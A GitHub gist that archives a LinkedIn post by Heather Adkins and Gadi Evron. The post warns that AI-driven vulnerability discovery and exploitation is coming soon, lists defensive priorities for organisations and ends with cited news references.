Created
August 29, 2025 19:40
-
-
Save emory/ce259c11f7685a694ad5aaaf8d35ba92 to your computer and use it in GitHub Desktop.
security and AI guidance about imminent danger from eminent experts on security and AI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
created: 2025-08-29T13:12:26 (UTC -05:00) | |
tags: [ linkedin, socialmedia, post, argvee, gadiEvron, heatherAdkins, infosec, cybersecurity, LLM, AI, warning, forecasting, vulnerabilityManagement, defence-in-depth, security, privacy, vulnerabilities, exploitation, malware, automation, business, globalIncidents ] | |
uri: https://www.linkedin.com/posts/argvee_the-ai-vulnerability-cataclysm-is-coming-activity-7366487550451945473-fO0L?utm_medium=ios_app&rcm=ACoAAAAP-tQBCFjoliV4TfzbwPonaukac6IY6Cc&utm_source=social_share_send&utm_campaign=share_via | |
author: [ Heather Adkins, Gadi Evron ] | |
type: [ capture ] | |
id: 20250827083212 | |
--- | |
[[Global Incidents]] | [[AI Guidance and Recommendations]] | [[Heather Adkins]] | |
# Some thoughts from Gadi Evron and I on the next 12 months. Read carefully, it’s important > Heather Adkins | |
> ## Excerpt | |
> Some thoughts from Gadi Evron and I on the next 12 months. Read carefully, it’s important. | |
# The AI Vulnerability Cataclysm is Coming: What It Is and How We Prepare | |
- Authors: | |
- [Heather Adkins](https://www.linkedin.com/in/argvee?trk=public_post_reshare-text) | |
- [Gadi Evron](https://il.linkedin.com/in/gadievron?trk=public_post_reshare-text) - Building a world-class AI security company at Knostic | CISO-in-Residence for Cloud Security Alliance | |
We are six months away, but hopefully longer, from the upcoming vulnerabilities cataclysm. We can prepare, mitigate harm, and maybe win if AI defense catches up. Throughout our careers, we’ve avoided security alarmism, guided by a simple principle: the sun will always rise again. But today, we must speak a hard truth. Optimism alone can’t shield us from what comes next. Within six months, AI could make exploitation so fast it breaks cyber defense: | |
Within six months, AI could make exploitation so fast it breaks cyber defense: | |
• AI dominance: AI is already topping HackerOne’s leaderboard. | |
• Accessibility: In DARPA’s AIxCC, teams found 54 vulnerabilities in four hours, and their tools are now open-source. | |
• Signal from the top: Google’s Gemini-based “Big Sleep” has already uncovered dozens of vulnerabilities. | |
• AI dominance: AI is already topping HackerOne’s leaderboard. | |
• Accessibility: In DARPA’s AIxCC, teams found 54 vulnerabilities in four hours, and their tools are now open-source. | |
• Signal from the top: Google’s Gemini-based “Big Sleep” has already uncovered dozens of vulnerabilities. | |
AI assistants like Cursor and Copilot fuel an explosion in global code. Vibe coding boosts velocity but removes critical checks, producing insecure code at scale. | |
Attackers are already in their AI singularity moment, whereas ours has not yet begun. APT28 is using LLMs for living-off-the-land operations. Per-install obfuscation, adaptive persistence, C2, steganography, EDR deception, and automated exploit generation are next. Imagine being an analyst as every compromise unfolds uniquely, at machine speed. | |
This is not a message of doom, and fuzzing or static analysis still surpass many agents. It is an urgent call to prepare. We may not be able to stop the storm, but we can reduce its impact. | |
Long-term, the solution involves defensive LLMs and self-defending architectures that can detect attacks, adapt in real-time, and mislead adversaries. Hints of this appear in AIxCC, where fixes were suggested alongside findings. | |
In the meantime, in an AI-driven threat landscape, the old familiar fundamentals will become existential: | |
• Shrink the attack surface: Retire legacy, remove unused code, disable unnecessary features. Accelerate zero-trust, and constrain what can run. | |
• Buy resilience, not features: Demand security proof points, hot-patching, and reliability as purchasing requirements. | |
• Turn the spotlight inward: Invest to find vulnerabilities before adversaries. | |
• Strengthen alliances: Expand bug bounties, establish safe reporting channels, and support open source. | |
But also, consider expanding to different avenues: | |
• Deception capabilities: Consider defenses not dependent on the attack tool used. | |
• Form coalitions: Vendors prioritize customers, and security can be treated as a priority. By forming coalitions, we can push the ecosystem to improve security. | |
• The AI literacy divide: Invest in educating yourself and your people to understand what’s possible. Check out Prompt||GTFO on YouTube. | |
Naturally, enterprise processes take time, but we should not wait to get started. The time for deliberation is over. It’s time for good people to come together and get focused. | |
It’s time for good people to come together and get focused. References in first comment. | |
*** | |
> NOTE this is pulled from the comments on Gadi's original post, and I've rewritten them to be markdown links :dealwithit: | |
## the citations in OP: | |
**References**: | |
/begin revised list | |
• [XBOW AI Tops HackerOne’s US Bug Bounty Leaderboard (TechRepublic)](https://www.techrepublic.com/article/news-ai-xbow-tops-hackerone-us-leaderboad) | |
• [DARPA AIxCC Results: AI Cyber Reasoning Tools Released Open Source (DARPA)](https://www.darpa.mil/news/2025/aixcc-results) | |
• [Google’s Big Sleep AI Tool Finds 20 Vulnerabilities (TechCrunch)](https://techcrunch.com/2025/08/04/googles-big-sleep-ai-tool-discovers-20-vulnerabilities) | |
• [GitHub Copilot Boosts Developer Productivity by 55.8% in Controlled Study (GitHub Blog)](https://github.blog/2022-07-14-research-github-copilot-improves-developer-productivity) | |
• [Asleep at the Keyboard? Assessing the Security of GitHub Copilot’s Code Contributions (Arxiv)](https://arxiv.org/abs/2108.09293) | |
• [Vibe Coding: Definition and Origin (Wikipedia)](https://en.wikipedia.org/wiki/Vibe_coding) | |
• [Tea App Data Breach Exposes Over a Million Messages (TechCrunch)](https://techcrunch.com/2025/08/06/tea-app-breach-data-leak) | |
• [APT28’s LAMEHUG Malware Uses LLMs to Generate Commands (BleepingComputer)](https://www.bleepingcomputer.com/news/security/lamehug-malware-uses-ai-llm-to-craft-windows-data-theft-commands-in-real-time/) | |
/end [emory's](http://incumbent.org/) revised list | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment